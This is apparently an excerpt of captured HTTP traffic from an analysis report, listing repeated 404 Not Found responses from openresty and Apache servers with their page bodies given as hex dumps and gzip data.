      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Mon, 05 Dec 2022 14:17:38 GMTContent-Type: text/html; charset=utf-8Content-Length: 39481Connection: closeAccept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 32 3f 66 61 6d 69 6c 79 3d 4e 6f 74 6f 2b 53 61 6e 73 3a 77 67 68 74 40 34 30 30 3b 37 30 30 26 61 6d 70 3b 64 69 73 70 6c 61 79 3d 73 77 61 70 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 79 61 73 74 61 74 69 63 2e 6e 65 74 2f 70 63 6f 64 65 2f 61 64 66 6f 78 2f 6c 6f 61 64 65 72 2e 6a 73 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 3e 0a 76 61 72 20 70 75 6e 79 63 6f 64 65 20 3d 20 6e 65 77 20 66 75 6e 63 74 69 6f 6e 20 50 75 6e 79 63 6f 64 65 28 29 20 7b 0a 20 20 20 20 74 68 69 73 2e 75 74 66 31 36 20 3d 20 7b 0a 20 20 20 20 20 20 20 20 64 65 63 6f 64 65 3a 66 75 6e 63 74 69 6f 6e 28 69 6e 70 75 74 29 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 6f 75 74 70 75 74 20 3d 20 5b 5d 2c 20 69 3d 30 2c 20 6c 65 6e 3d 69 6e 70 75 74 2e 6c 65 6e 67 74 68 2c 76 61 6c 75 65 2c 65 78 74 72 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 68 69 6c 65 20 28 69 20 3c 20 6c 65 6e 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 6c 75 65 20 3d 20 69 6e 70 75 74 2e 63 68 61 72 43 6f 64 65 41 74 28 69 2b 2b 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 28 76 61 6c 75 65 20 26 20 30 78 46 38 30 30 29 20 3d 3d 3d 20 30 78 44 38 30 30 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 65 78 74 72 61 20 3d 20 69 6e 70 75 74 2e 63 68 61 72 43 6f 64 65 41 74 28 69 2b 2b 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 20 28 28 76 61 6c 75 65 20 26 20 30 78 46 43 30 30 29 20 21 3d 3d 20 30 78 44 38 30 30 29 20 7c 7c 20 28 28 65 78 74 72 61 20 26 20 30 78 46 43 30 30 29 20 21 3d 3d 20 30 78 44 43 30 30 29 20 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 68 72 6f 77 20 6e 65 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 55 54 46 2d 31 36 28 64 65 63 6f 64 65 29 3a 2
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Mon, 05 Dec 2022 14:17:40 GMTContent-Type: text/html; charset=utf-8Content-Length: 39481Connection: closeAccept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 32 3f 66 61 6d 69 6c 79 3d 4e 6f 74 6f 2b 53 61 6e 73 3a 77 67 68 74 40 34 30 30 3b 37 30 30 26 61 6d 70 3b 64 69 73 70 6c 61 79 3d 73 77 61 70 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 79 61 73 74 61 74 69 63 2e 6e 65 74 2f 70 63 6f 64 65 2f 61 64 66 6f 78 2f 6c 6f 61 64 65 72 2e 6a 73 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 3e 0a 76 61 72 20 70 75 6e 79 63 6f 64 65 20 3d 20 6e 65 77 20 66 75 6e 63 74 69 6f 6e 20 50 75 6e 79 63 6f 64 65 28 29 20 7b 0a 20 20 20 20 74 68 69 73 2e 75 74 66 31 36 20 3d 20 7b 0a 20 20 20 20 20 20 20 20 64 65 63 6f 64 65 3a 66 75 6e 63 74 69 6f 6e 28 69 6e 70 75 74 29 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 6f 75 74 70 75 74 20 3d 20 5b 5d 2c 20 69 3d 30 2c 20 6c 65 6e 3d 69 6e 70 75 74 2e 6c 65 6e 67 74 68 2c 76 61 6c 75 65 2c 65 78 74 72 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 68 69 6c 65 20 28 69 20 3c 20 6c 65 6e 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 6c 75 65 20 3d 20 69 6e 70 75 74 2e 63 68 61 72 43 6f 64 65 41 74 28 69 2b 2b 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 28 76 61 6c 75 65 20 26 20 30 78 46 38 30 30 29 20 3d 3d 3d 20 30 78 44 38 30 30 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 65 78 74 72 61 20 3d 20 69 6e 70 75 74 2e 63 68 61 72 43 6f 64 65 41 74 28 69 2b 2b 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 20 28 28 76 61 6c 75 65 20 26 20 30 78 46 43 30 30 29 20 21 3d 3d 20 30 78 44 38 30 30 29 20 7c 7c 20 28 28 65 78 74 72 61 20 26 20 30 78 46 43 30 30 29 20 21 3d 3d 20 30 78 44 43 30 30 29 20 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 68 72 6f 77 20 6e 65 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 55 54 46 2d 31 36 28 64 65 63 6f 64 65 29 3a 2
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Mon, 05 Dec 2022 14:17:42 GMTContent-Type: text/html; charset=utf-8Content-Length: 39481Connection: closeAccept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 32 3f 66 61 6d 69 6c 79 3d 4e 6f 74 6f 2b 53 61 6e 73 3a 77 67 68 74 40 34 30 30 3b 37 30 30 26 61 6d 70 3b 64 69 73 70 6c 61 79 3d 73 77 61 70 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 79 61 73 74 61 74 69 63 2e 6e 65 74 2f 70 63 6f 64 65 2f 61 64 66 6f 78 2f 6c 6f 61 64 65 72 2e 6a 73 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 3e 0a 76 61 72 20 70 75 6e 79 63 6f 64 65 20 3d 20 6e 65 77 20 66 75 6e 63 74 69 6f 6e 20 50 75 6e 79 63 6f 64 65 28 29 20 7b 0a 20 20 20 20 74 68 69 73 2e 75 74 66 31 36 20 3d 20 7b 0a 20 20 20 20 20 20 20 20 64 65 63 6f 64 65 3a 66 75 6e 63 74 69 6f 6e 28 69 6e 70 75 74 29 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 6f 75 74 70 75 74 20 3d 20 5b 5d 2c 20 69 3d 30 2c 20 6c 65 6e 3d 69 6e 70 75 74 2e 6c 65 6e 67 74 68 2c 76 61 6c 75 65 2c 65 78 74 72 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 68 69 6c 65 20 28 69 20 3c 20 6c 65 6e 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 6c 75 65 20 3d 20 69 6e 70 75 74 2e 63 68 61 72 43 6f 64 65 41 74 28 69 2b 2b 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 28 76 61 6c 75 65 20 26 20 30 78 46 38 30 30 29 20 3d 3d 3d 20 30 78 44 38 30 30 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 65 78 74 72 61 20 3d 20 69 6e 70 75 74 2e 63 68 61 72 43 6f 64 65 41 74 28 69 2b 2b 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 20 28 28 76 61 6c 75 65 20 26 20 30 78 46 43 30 30 29 20 21 3d 3d 20 30 78 44 38 30 30 29 20 7c 7c 20 28 28 65 78 74 72 61 20 26 20 30 78 46 43 30 30 29 20 21 3d 3d 20 30 78 44 43 30 30 29 20 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 68 72 6f 77 20 6e 65 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 55 54 46 2d 31 36 28 64 65 63 6f 64 65 29 3a 2
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Mon, 05 Dec 2022 14:17:44 GMTContent-Type: text/html; charset=utf-8Content-Length: 39481Connection: closeAccept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 32 3f 66 61 6d 69 6c 79 3d 4e 6f 74 6f 2b 53 61 6e 73 3a 77 67 68 74 40 34 30 30 3b 37 30 30 26 61 6d 70 3b 64 69 73 70 6c 61 79 3d 73 77 61 70 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 79 61 73 74 61 74 69 63 2e 6e 65 74 2f 70 63 6f 64 65 2f 61 64 66 6f 78 2f 6c 6f 61 64 65 72 2e 6a 73 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 3e 0a 76 61 72 20 70 75 6e 79 63 6f 64 65 20 3d 20 6e 65 77 20 66 75 6e 63 74 69 6f 6e 20 50 75 6e 79 63 6f 64 65 28 29 20 7b 0a 20 20 20 20 74 68 69 73 2e 75 74 66 31 36 20 3d 20 7b 0a 20 20 20 20 20 20 20 20 64 65 63 6f 64 65 3a 66 75 6e 63 74 69 6f 6e 28 69 6e 70 75 74 29 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 6f 75 74 70 75 74 20 3d 20 5b 5d 2c 20 69 3d 30 2c 20 6c 65 6e 3d 69 6e 70 75 74 2e 6c 65 6e 67 74 68 2c 76 61 6c 75 65 2c 65 78 74 72 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 68 69 6c 65 20 28 69 20 3c 20 6c 65 6e 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 6c 75 65 20 3d 20 69 6e 70 75 74 2e 63 68 61 72 43 6f 64 65 41 74 28 69 2b 2b 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 28 76 61 6c 75 65 20 26 20 30 78 46 38 30 30 29 20 3d 3d 3d 20 30 78 44 38 30 30 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 65 78 74 72 61 20 3d 20 69 6e 70 75 74 2e 63 68 61 72 43 6f 64 65 41 74 28 69 2b 2b 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 20 28 28 76 61 6c 75 65 20 26 20 30 78 46 43 30 30 29 20 21 3d 3d 20 30 78 44 38 30 30 29 20 7c 7c 20 28 28 65 78 74 72 61 20 26 20 30 78 46 43 30 30 29 20 21 3d 3d 20 30 78 44 43 30 30 29 20 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 68 72 6f 77 20 6e 65 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 55 54 46 2d 31 36 28 64 65 63 6f 64 65 29 3a 2
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Dec 2022 14:17:50 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Fri, 01 May 2020 23:50:34 GMTAccept-Ranges: bytesVary: Accept-EncodingContent-Encoding: gzipContent-Length: 462Content-Type: text/htmlData Raw: 1f 8b 08 00 00 00 00 00 00 03 5d 92 4d 8f d3 30 10 86 ef fd 15 43 38 00 52 dd 8f a5 0b 28 1f 15 17 e0 82 d0 6a 57 70 9f c4 d3 c4 c2 f1 04 7b da a6 ac f6 bf 6f 9c b4 cb b2 f2 c1 f2 78 de 77 9e 19 3b 7f a5 b9 92 53 47 d0 48 6b b7 b3 3c 6e 60 d1 d5 45 42 2e 89 01 42 bd 9d 01 e4 2d 09 42 d5 a0 0f 24 45 b2 97 9d fa 94 fc bb 68 44 3a 45 7f f6 e6 50 24 bd da a3 aa b8 ed 50 4c 69 29 81 8a 9d 90 1b 54 86 0a d2 35 4d 3a 31 62 69 bb 59 6d e0 8b f7 ec f3 e5 14 78 b2 74 d8 52 91 1c 0c 1d 3b f6 f2 cc e5 68 b4 34 85 a6 83 a9 48 8d 87 39 18 67 c4 a0 55 a1 42 4b c5 3a 79 69 e3 b9 64 09 cf 4c 1c 1b a7 a9 9f 83 e3 1d 5b cb c7 49 12 e4 34 31 00 7c 6e 49 1b 84 50 79 22 07 e8 34 bc 6d b1 9f 0a a6 d7 ab 55 d7 bf 83 fb 31 13 a0 64 7d 82 7b d8 0d ee 2a 98 bf 94 c2 e2 03 b5 19 3c c0 98 f0 10 ad 97 67 ef 7c 39 cd 74 96 8f aa 31 5a 24 42 bd 28 b4 a6 76 29 54 03 21 f9 6c 20 8a ba 66 7d c9 19 ed 77 d8 1a 7b 4a e1 1b b1 af 0d ce 21 90 37 bb 6c e8 cc b2 4f e1 f5 06 e3 ca a0 c5 e1 da 29 e1 2e 85 4d 64 b1 c6 91 6a c8 d4 8d a4 b0 5e 5c 67 c9 d4 e7 1d 7b 7f 9a 83 34 26 40 87 35 81 66 0a ee 8d 00 f5 26 c8 22 2f fd f6 c6 12 06 1a 5e 9f aa df 43 22 c1 cf db ef c0 1e 6a 86 12 87 10 8e c2 c5 d8 65 b3 8e b6 23 f8 d5 05 1c e0 3f f4 5f e4 35 ba 88 8e 2e a8 17 fc 1f 75 5c d9 a4 38 9e 71 df af 56 17 dc a7 0f b3 80 9b 48 fb 83 05 be f2 de e9 73 f9 ab b1 7c be 8c c3 8d 43 5e 4e 3f fb 11 21 b9 04 0e ea 02 00 00 Data Ascii: ]M0C8R(jWp{oxw;SGHk<n`EB.B-B$EhD:EP$PLi)T5M:1biYmxtR;h4H9gUBK:yidL[I41|nIPy"4mU1d}{*<g|9t1Z$B(v)T!l f}w{J!7lO).Mdj^\g{4&@5f&"/^C"je#?_5.u\8qVHs|C^N?!
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Dec 2022 14:17:52 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Fri, 01 May 2020 23:50:34 GMTAccept-Ranges: bytesVary: Accept-EncodingContent-Encoding: gzipContent-Length: 462Content-Type: text/htmlData Raw: 1f 8b 08 00 00 00 00 00 00 03 5d 92 4d 8f d3 30 10 86 ef fd 15 43 38 00 52 dd 8f a5 0b 28 1f 15 17 e0 82 d0 6a 57 70 9f c4 d3 c4 c2 f1 04 7b da a6 ac f6 bf 6f 9c b4 cb b2 f2 c1 f2 78 de 77 9e 19 3b 7f a5 b9 92 53 47 d0 48 6b b7 b3 3c 6e 60 d1 d5 45 42 2e 89 01 42 bd 9d 01 e4 2d 09 42 d5 a0 0f 24 45 b2 97 9d fa 94 fc bb 68 44 3a 45 7f f6 e6 50 24 bd da a3 aa b8 ed 50 4c 69 29 81 8a 9d 90 1b 54 86 0a d2 35 4d 3a 31 62 69 bb 59 6d e0 8b f7 ec f3 e5 14 78 b2 74 d8 52 91 1c 0c 1d 3b f6 f2 cc e5 68 b4 34 85 a6 83 a9 48 8d 87 39 18 67 c4 a0 55 a1 42 4b c5 3a 79 69 e3 b9 64 09 cf 4c 1c 1b a7 a9 9f 83 e3 1d 5b cb c7 49 12 e4 34 31 00 7c 6e 49 1b 84 50 79 22 07 e8 34 bc 6d b1 9f 0a a6 d7 ab 55 d7 bf 83 fb 31 13 a0 64 7d 82 7b d8 0d ee 2a 98 bf 94 c2 e2 03 b5 19 3c c0 98 f0 10 ad 97 67 ef 7c 39 cd 74 96 8f aa 31 5a 24 42 bd 28 b4 a6 76 29 54 03 21 f9 6c 20 8a ba 66 7d c9 19 ed 77 d8 1a 7b 4a e1 1b b1 af 0d ce 21 90 37 bb 6c e8 cc b2 4f e1 f5 06 e3 ca a0 c5 e1 da 29 e1 2e 85 4d 64 b1 c6 91 6a c8 d4 8d a4 b0 5e 5c 67 c9 d4 e7 1d 7b 7f 9a 83 34 26 40 87 35 81 66 0a ee 8d 00 f5 26 c8 22 2f fd f6 c6 12 06 1a 5e 9f aa df 43 22 c1 cf db ef c0 1e 6a 86 12 87 10 8e c2 c5 d8 65 b3 8e b6 23 f8 d5 05 1c e0 3f f4 5f e4 35 ba 88 8e 2e a8 17 fc 1f 75 5c d9 a4 38 9e 71 df af 56 17 dc a7 0f b3 80 9b 48 fb 83 05 be f2 de e9 73 f9 ab b1 7c be 8c c3 8d 43 5e 4e 3f fb 11 21 b9 04 0e ea 02 00 00 Data Ascii: ]M0C8R(jWp{oxw;SGHk<n`EB.B-B$EhD:EP$PLi)T5M:1biYmxtR;h4H9gUBK:yidL[I41|nIPy"4mU1d}{*<g|9t1Z$B(v)T!l f}w{J!7lO).Mdj^\g{4&@5f&"/^C"je#?_5.u\8qVHs|C^N?!
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Dec 2022 14:17:55 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Fri, 01 May 2020 23:50:34 GMTAccept-Ranges: bytesVary: Accept-EncodingContent-Encoding: gzipContent-Length: 462Content-Type: text/htmlData Raw: 1f 8b 08 00 00 00 00 00 00 03 5d 92 4d 8f d3 30 10 86 ef fd 15 43 38 00 52 dd 8f a5 0b 28 1f 15 17 e0 82 d0 6a 57 70 9f c4 d3 c4 c2 f1 04 7b da a6 ac f6 bf 6f 9c b4 cb b2 f2 c1 f2 78 de 77 9e 19 3b 7f a5 b9 92 53 47 d0 48 6b b7 b3 3c 6e 60 d1 d5 45 42 2e 89 01 42 bd 9d 01 e4 2d 09 42 d5 a0 0f 24 45 b2 97 9d fa 94 fc bb 68 44 3a 45 7f f6 e6 50 24 bd da a3 aa b8 ed 50 4c 69 29 81 8a 9d 90 1b 54 86 0a d2 35 4d 3a 31 62 69 bb 59 6d e0 8b f7 ec f3 e5 14 78 b2 74 d8 52 91 1c 0c 1d 3b f6 f2 cc e5 68 b4 34 85 a6 83 a9 48 8d 87 39 18 67 c4 a0 55 a1 42 4b c5 3a 79 69 e3 b9 64 09 cf 4c 1c 1b a7 a9 9f 83 e3 1d 5b cb c7 49 12 e4 34 31 00 7c 6e 49 1b 84 50 79 22 07 e8 34 bc 6d b1 9f 0a a6 d7 ab 55 d7 bf 83 fb 31 13 a0 64 7d 82 7b d8 0d ee 2a 98 bf 94 c2 e2 03 b5 19 3c c0 98 f0 10 ad 97 67 ef 7c 39 cd 74 96 8f aa 31 5a 24 42 bd 28 b4 a6 76 29 54 03 21 f9 6c 20 8a ba 66 7d c9 19 ed 77 d8 1a 7b 4a e1 1b b1 af 0d ce 21 90 37 bb 6c e8 cc b2 4f e1 f5 06 e3 ca a0 c5 e1 da 29 e1 2e 85 4d 64 b1 c6 91 6a c8 d4 8d a4 b0 5e 5c 67 c9 d4 e7 1d 7b 7f 9a 83 34 26 40 87 35 81 66 0a ee 8d 00 f5 26 c8 22 2f fd f6 c6 12 06 1a 5e 9f aa df 43 22 c1 cf db ef c0 1e 6a 86 12 87 10 8e c2 c5 d8 65 b3 8e b6 23 f8 d5 05 1c e0 3f f4 5f e4 35 ba 88 8e 2e a8 17 fc 1f 75 5c d9 a4 38 9e 71 df af 56 17 dc a7 0f b3 80 9b 48 fb 83 05 be f2 de e9 73 f9 ab b1 7c be 8c c3 8d 43 5e 4e 3f fb 11 21 b9 04 0e ea 02 00 00 Data Ascii: ]M0C8R(jWp{oxw;SGHk<n`EB.B-B$EhD:EP$PLi)T5M:1biYmxtR;h4H9gUBK:yidL[I41|nIPy"4mU1d}{*<g|9t1Z$B(v)T!l f}w{J!7lO).Mdj^\g{4&@5f&"/^C"je#?_5.u\8qVHs|C^N?!
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Dec 2022 14:17:57 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Fri, 01 May 2020 23:50:34 GMTAccept-Ranges: bytesContent-Length: 746Vary: Accept-EncodingContent-Type: text/htmlData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 65 3d 65 64 67 65 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 35 30 30 70 78 29 20 7b 0a 20 20 20 20 20 20 62 6f 64 79 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 2e 36 65 6d 3b 20 7d 20 0a 20 20 20 20 7d 0a 20 20 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 22 3e 0a 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 47 65 6f 72 67 69 61 2c 20 73 65 72 69 66 3b 20 63 6f 6c 6f 72 3a 20 23 34 61 34 61 34 61 3b 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 34 65 6d 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 35 3b 22 3e 0a 20 20 20 20 53 6f 72 72 79 2c 20 74 68 69 73 20 70 61 67 65 20 64 6f 65 73 6e 27 74 20 65 78 69 73 74 2e 3c 62 72 3e 50 6c 65 61 73 65 20 63 68 65 63 6b 20 74 68 65 20 55 52 4c 20 6f 72 20 67 6f 20 62 61 63 6b 20 61 20 70 61 67 65 2e 0a 20 20 3c 2f 68 31 3e 0a 20 20 0a 20 20 3c 68 32 20 73 74 79 6c 65 3d 22 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 63 6f 6c 6f 72 3a 20 23 37 64 37 64 37 64 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 22 3e 